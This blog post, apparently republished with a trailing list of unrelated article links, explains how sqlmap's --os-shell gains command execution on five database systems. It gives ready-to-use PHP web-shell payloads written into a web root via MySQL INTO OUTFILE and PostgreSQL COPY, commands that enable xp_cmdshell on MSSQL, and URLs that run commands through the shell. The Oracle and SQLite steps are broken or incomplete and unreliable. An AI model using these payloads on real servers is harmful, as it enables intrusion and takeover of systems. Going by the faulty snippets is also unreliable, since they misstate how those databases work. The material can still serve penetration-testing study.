sqlmap --os-shell的原理(MySQL,MSSQL,PostgreSQL,Oracle,SQLite)

1. MySQL

條件
  • 數據庫用戶需要具備高權限(如 FILE 權限)。
  • 數據庫服務運行用戶需要對目標目錄有寫權限。
  • Web 服務器有可寫目錄,且支持執行上傳的腳本(如 PHP、JSP 等)。
原理
  • 利用 MySQL 的 SELECT ... INTO OUTFILE 功能,將惡意代碼寫入目標 Web 目錄,生成一個 Web Shell 文件。
  • 攻擊者通過瀏覽器訪問 Web Shell,獲得命令執行能力。
流程
  1. 確認 FILE 權限: 
    SELECT * FROM mysql.user WHERE User='target_user';

  2. 寫入 Web Shell 到目標目錄: 
    SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';
  3. 通過瀏覽器訪問 Web Shell 執行命令: 
    http://xxxxxx.com/shell.php?cmd=whoami

2. Microsoft SQL Server (MSSQL)

條件
  • 數據庫用戶需要 sysadmin 權限。
  • 目標服務器啟用了擴展存儲過程 xp_cmdshell
  • 數據庫運行用戶有命令執行權限。
原理
  • 調用 MSSQL 的 xp_cmdshell 存儲過程,直接在操作系統中執行命令。
流程
  1. 確認是否啟用了 xp_cmdshell
    EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

  2. 利用 xp_cmdshell 執行命令: 
    EXEC xp_cmdshell 'whoami';
  3. 通過命令的輸出或回顯獲取執行結果。

3. PostgreSQL

條件
  • 數據庫用戶需要對文件系統具有寫權限。
  • 數據庫支持使用 COPY 命令將數據寫入文件。
  • 目標 Web 目錄可寫入文件,并允許腳本執行。
原理
  • 利用 PostgreSQL 的 COPY 功能,將 Web Shell 寫入目標文件系統。
流程
  1. 寫入 Web Shell: 
    COPY (SELECT '<?php system($_GET["cmd"]); ?>') TO '/var/www/html/shell.php';
  2. 訪問 Web Shell:

    http://xxxxx.com/shell.php?cmd=id

4. Oracle

條件
  • 數據庫用戶需要 CREATE LIBRARY 權限。
  • 數據庫運行用戶需要訪問操作系統。
  • 利用外部過程或 Java 存儲過程。
原理
  • 通過 Oracle 數據庫的外部過程,調用操作系統命令。
  • 使用 Java 存儲過程執行系統級操作。
流程
  1. 創建外部庫(如 DLL 文件): 
    CREATE OR REPLACE LIBRARY mylib AS '/path/to/external/file';
  2. 調用外部過程執行命令: 
    DECLAREcmd VARCHAR2(1000);
BEGINcmd := 'ls';DBMS_SCHEDULER.CREATE_JOB(cmd);
END;
  3. 讀取命令執行結果。

5. SQLite

條件
  • SQLite 本身無法直接與操作系統交互。
  • 必須結合其他漏洞(如本地文件包含)實現 Web Shell。
原理
  • 利用 SQLite 的 ATTACH 或其他功能,嘗試將惡意數據寫入特定目錄。
流程
  1. 寫入數據: 
    ATTACH DATABASE '/var/www/html/shell.php' AS shell;
  2. 在 Web 服務器中訪問生成的 Web Shell 文件。

總結表

數據庫條件原理流程簡述
MySQLFILE 權限,Web 目錄可寫寫入 Web Shell 通過 SELECT ... INTO OUTFILE寫 Shell -> 訪問 Shell -> 執行命令
MSSQLsysadmin 權限,啟用 xp_cmdshell使用 xp_cmdshell 直接執行系統命令開啟 xp_cmdshell -> 執行命令
PostgreSQL寫權限,Web 目錄可訪問使用 COPY 寫入 Web Shell寫 Shell -> 訪問 Shell -> 執行命令
OracleCREATE LIBRARY 權限,系統訪問權限使用外部庫或 Java 存儲過程調用系統命令配置庫 -> 調用命令
SQLite結合其他漏洞(如文件包含)寫入惡意數據文件,結合其他漏洞(如 LFI)訪問寫 Shell -> 結合 LFI 執行

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/web/62344.shtml
繁體地址,請注明出處:http://hk.pswp.cn/web/62344.shtml
英文地址,請注明出處:http://en.pswp.cn/web/62344.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

Springboot 2.x 升級到Springboot 2.7.x問題匯總

Springboot 2.x 升級到Springboot 2.7.x問題匯總

Springboot 2.x 升級到Springboot 2.7.x問題 Springboot 2.x 升級到Springboot 2.7.x問題匯總 不廢話 上干貨 改變 1.mysql依賴groupId和artifactId更改&#xff1b; <dependency><groupId>com.mysql</groupId><artifactId>mysql-connector-j</…
閱讀更多...
【計算機網絡】實驗13:運輸層端口

【計算機網絡】實驗13:運輸層端口

實驗13 運輸層端口 一、實驗目的 本次實驗旨在驗證TCP和IP運輸層端口號的作用&#xff0c;深入理解它們在網絡通信中的重要性。通過實驗&#xff0c;我將探討端口號如何幫助區分不同的應用程序和服務&#xff0c;使得在同一臺主機上能夠同時運行多個網絡服務而不發生沖突。此…
閱讀更多...
【Redis】Redis基礎——Redis的安裝及啟動

【Redis】Redis基礎——Redis的安裝及啟動

一、初識Redis 1. 認識NoSQL 數據結構&#xff1a;對于SQL來說&#xff0c;表是有結構的&#xff0c;如字段約束、字段存儲大小等。 關聯性&#xff1a;SQL 的關聯性體現在兩張表之間可以通過外鍵&#xff0c;將兩張表的數據關聯查詢出完整的數據。 查詢方式&#xff1a; 2.…
閱讀更多...
vuex 是什么?怎么使用?哪種功能場景使用它?

vuex 是什么?怎么使用?哪種功能場景使用它?

Vuex是Vue.js的狀態管理庫。它可以用來管理應用程序中的共享狀態&#xff0c;并提供了一種集中式的方式來管理狀態的變化。 使用Vuex&#xff0c;首先需要安裝它&#xff1a; npm install vuex --save然后&#xff0c;在Vue應用程序的入口文件中&#xff0c;導入Vuex并在Vue實…
閱讀更多...
ElK 8 收集 MySQL 慢查詢日志并通過 ElastAlert2 告警至飛書

ElK 8 收集 MySQL 慢查詢日志并通過 ElastAlert2 告警至飛書

文章目錄 1. 說明2. 啟個 mysql3. 設置慢查詢4. filebeat 設置5. 觸發慢查詢6. MySQL 告警至飛書 1. 說明 elk 版本&#xff1a;8.15.0 2. 啟個 mysql docker-compose.yml 中 mysql&#xff1a; mysql:# restart: alwaysimage: mysql:8.0.27# ports:# - "3306:3306&q…
閱讀更多...
PyTorch基本使用-張量的索引操作

PyTorch基本使用-張量的索引操作

在操作張量時&#xff0c;經常要去獲取某些元素進行處理或者修改操作&#xff0c;在這里需要了解torch中的索引操作。 準備數據&#xff1a; data torch.randint(0,10,[4,5]) print(data--->,data)輸出結果&#xff1a; data---> tensor([[3, 9, 4, 0, 5],[7, 5, 9, …
閱讀更多...
【服務器監控】grafana+Prometheus+node exporter詳細部署文檔

【服務器監控】grafana+Prometheus+node exporter詳細部署文檔

我們在進行測試時&#xff0c;不可能一直手動看著服務器的性能消耗&#xff0c;這時候就需要有個工具替我們監控服務器的性能消耗。這里記錄下grafanaPrometheusnodeExporter的組合用于監控服務器。 簡單介紹&#xff1a; grafana&#xff1a;看板工具&#xff0c;所有采集的…
閱讀更多...
第十七章 使用 MariaDB 數據庫管理系統

第十七章 使用 MariaDB 數據庫管理系統

1. 數據庫管理系統 數據庫是指按照某些特定結構來存儲數據資料的數據倉庫。在當今這個大數據技術迅速崛起的年代&#xff0c;互聯網上每天都會生成海量的數據信息&#xff0c;數據庫技術也從最初只能存儲簡單的表格數據的單一集中存儲模式&#xff0c;發展到了現如今存儲海量…
閱讀更多...
Jenkins授權策略的配置

Jenkins授權策略的配置

簡介:在Jenkins中,通過系統管理下的“Manage and Assign Roles”以及“Manage Roles”來配置角色,是實現權限管理的關鍵步驟。以下是關于這兩個功能配置角色時的意義及注意事項的詳細解釋: 一、配置角色的意義 實現權限控制: 通過創建和分配角色,可以精確地控制不同用戶…
閱讀更多...
centos 7.9 安裝jdk1.8 mysql redis等

centos 7.9 安裝jdk1.8 mysql redis等

環境&#xff1a; centos 7.9 1、安裝OpenJDK 1.8 步驟 1: 更新系統 首先&#xff0c;確保你的系統是最新的&#xff0c;執行以下命令來更新所有軟件包&#xff1a; sudo yum update -y步驟 2: 安裝 OpenJDK 1.8 CentOS 7 默認的包管理器是 yum&#xff0c;你可以通過以下命…
閱讀更多...
計算機鍵盤的演變 | 鍵盤鍵名稱及其功能 | 鍵盤指法

計算機鍵盤的演變 | 鍵盤鍵名稱及其功能 | 鍵盤指法

注&#xff1a;本篇為 “鍵盤的演變及其功能” 相關幾篇文章合輯。 英文部分機翻未校。 The Evolution of Keyboards: From Typewriters to Tech Marvels 鍵盤的演變&#xff1a;從打字機到技術奇跡 Introduction 介紹 The keyboard has journeyed from a humble mechanical…
閱讀更多...
Methods and Initializers

Methods and Initializers

1 Method Declarations 這回不從comipler開始&#xff0c;從runtime開始。 GC也需要follow 接下來難點在于如何填充這些表 2 Compiling method declarations 難點&#xff1a; 一個類可以聲明任意數量的方法。運行時需要查找并綁定所有這些方法。如果將這些方法都打包到一條…
閱讀更多...
飛飛5.4游戲源碼(客戶端+服務端+工具完整源代碼+5.3fix+5.4patch+數據庫可編譯進游戲)

飛飛5.4游戲源碼(客戶端+服務端+工具完整源代碼+5.3fix+5.4patch+數據庫可編譯進游戲)

飛飛5.4游戲源碼&#xff08;客戶端服務端工具完整源代碼5.3fix5.4patch數據庫可編譯進游戲&#xff09; 下載地址&#xff1a; 通過網盤分享的文件&#xff1a;【源碼】飛飛5.4游戲源碼&#xff08;客戶端服務端工具完整源代碼5.3fix5.4patch數據庫可編譯進游戲&#xff09; 鏈…
閱讀更多...
開源C代碼之路:一、Gitee

開源C代碼之路:一、Gitee

開源c代碼之路&#xff1a;一&#xff0c;Gitee 前言1、開源項目2、從哪里找&#xff1f;3、舉個例子4、總結&#xff1a; 本系列回顧清單開源代碼示例 前言 從開源開發的角度&#xff0c;由淺入深&#xff0c;一步步初探C語言編程的入門之路。 本篇講解&#xff1a;Gitee 1…
閱讀更多...
基于協同過濾算法的寵物用品商城的設計與實現(計算機畢業設計)Java Spring 衍生為任何商城系統 畢業論文

基于協同過濾算法的寵物用品商城的設計與實現(計算機畢業設計)Java Spring 衍生為任何商城系統 畢業論文

系統合集跳轉 源碼獲取鏈接 一、系統環境 運行環境: 最好是java jdk 1.8&#xff0c;我們在這個平臺上運行的。其他版本理論上也可以。 IDE環境&#xff1a; Eclipse,Myeclipse,IDEA或者Spring Tool Suite都可以 tomcat環境&#xff1a; Tomcat 7.x,8.x,9.x版本均可 操作系統…
閱讀更多...
算法-字符串-165.比較版本號

算法-字符串-165.比較版本號

一、題目 二、思路解析 1.思路&#xff1a; 比較的是兩個版本號它們以“.”作為分割的部分的有效值&#xff08;即數值&#xff09;是否一致 2.常用方法&#xff1a; 1.s.split("\\規則")&#xff0c;將字符串按參數規則進行分割并存儲在字符串數組中 String[] str …
閱讀更多...
MySQL(四)--索引

MySQL(四)--索引

MySQL的服務器,本質是在內存中的,那么所有對數據的CURD操作,全都是在對內存進行操作。 而,提高數據的CURD操作的效率,有兩種方式:1、組織數據的格式(數據結構);2、算法。 而,數據結構,就是索引,即組織數據的格式。 1、沒有索引的問題 索引:提高數據庫的性能,索…
閱讀更多...
C# (WinForms) 使用 iTextSharp 庫將圖片轉換為 PDF

C# (WinForms) 使用 iTextSharp 庫將圖片轉換為 PDF

iTextSharp簡介 iTextSharp 是一個開源的 .NET 庫&#xff0c;主要用于創建和操作 PDF 文檔。它是 iText 的 .NET 版本&#xff0c;iText 是一個廣泛使用的 Java 庫。iTextSharp 繼承了 iText 的核心功能并進行了適應 .NET 平臺的調整。 iTextSharp 的主要功能包括&#xff1a…
閱讀更多...
ubuntu防火墻設置(四)——iptables語法與防火墻基礎配置

ubuntu防火墻設置(四)——iptables語法與防火墻基礎配置

前面介紹的ufw和firewall-config均為iptables的前端&#xff0c; 分別適合個人用戶和服務器網絡管理 下面介紹底層——ipables iptables是一個強大的工具&#xff0c;用于配置Linux系統的防火墻。以下是一些基本的使用方法和示例&#xff0c;幫助您入門&#xff1a; 基本語法 …
閱讀更多...
【中間件開發】Redis基礎命令詳解及概念介紹

【中間件開發】Redis基礎命令詳解及概念介紹

文章目錄 前言一、Redis相關命令詳解及原理1.1 string、set、zset、list、hash1.1.1 string1.1.2 list1.1.3 hash1.1.4 set1.1.5 zset 1.2 分布式鎖的實現1.3 lua腳本解決ACID原子性1.4 Redis事務的ACID性質分析 二、Redis協議與異步方式2.1 Redis協議解析2.1.1 redis pipeline…
閱讀更多...
最新文章

Copyright @ 2022~2023